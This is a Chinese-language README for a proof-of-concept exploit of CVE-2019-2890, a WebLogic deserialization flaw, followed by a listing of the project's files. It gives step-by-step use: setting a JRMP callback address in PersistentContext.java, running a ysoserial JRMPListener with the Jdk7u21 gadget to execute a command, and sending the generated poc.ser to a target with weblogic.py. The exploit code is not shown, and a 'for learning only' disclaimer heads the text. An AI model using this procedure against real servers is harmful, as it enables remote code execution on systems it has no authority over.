0-sec.org## 声明
仅用于学习交流使用,其他用途后果自负。
## 说明
已经将相关jar文件都导入到了项目中,并且利用方式采用yso的JRMP,学习调试时候可以修改利用方式。
首先需要将weblogic下的 **SerializedSystemIni.dat** 文件放置到 **security** 文件夹下。
然后需要将yso重命名为 **ysoserial.jar** ,并且导入到 **lib** 目录下。

其次 **weblogic/wsee/jaxws/persistence/PersistentContext.java** 中的 **getObject** 的IP地址和端口。
```
try {
var3.writeObject(Poc.getObject("127.0.0.1:8000"));
} catch (Exception e) {
e.printStackTrace();
}
```
最后远程通过JRMP监听,利用7u21命令执行。
```
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"
```
使用方法,运行Poc.java生成poc.ser序列化文件,通过
```
python weblogic.py ip port poc.ser
```


[4.0K] /data/pocs/b5b5264dab6b5f6213e8a221d535d5a4407273ec
├── [ 882] CVE-2019-2890.iml
├── [4.0K] img
│ ├── [502K] 1.png
│ ├── [ 97K] 2.png
│ └── [127K] 3.png
├── [4.0K] libs
│ ├── [ 99K] com.bea.core.logging_1.9.0.0.jar
│ ├── [104K] com.bea.core.management.core_2.9.0.1.jar
│ ├── [1.4M] com.oracle.core.weblogic.msgcat_1.2.0.0.jar
│ ├── [2.4M] cryptoj.jar
│ ├── [872K] glassfish.jaxb_1.1.0.0_2-1-14.jar
│ └── [3.1M] wlthint3client.jar
├── [ 997] README.md
├── [4.0K] src
│ └── [4.0K] weblogic
│ └── [4.0K] wsee
│ └── [4.0K] jaxws
│ └── [4.0K] persistence
│ ├── [1.4K] EncryptionUtil.java
│ ├── [9.0K] PersistentContext.java
│ └── [1.9K] Poc.java
└── [5.3K] weblogic.py
7 directories, 15 files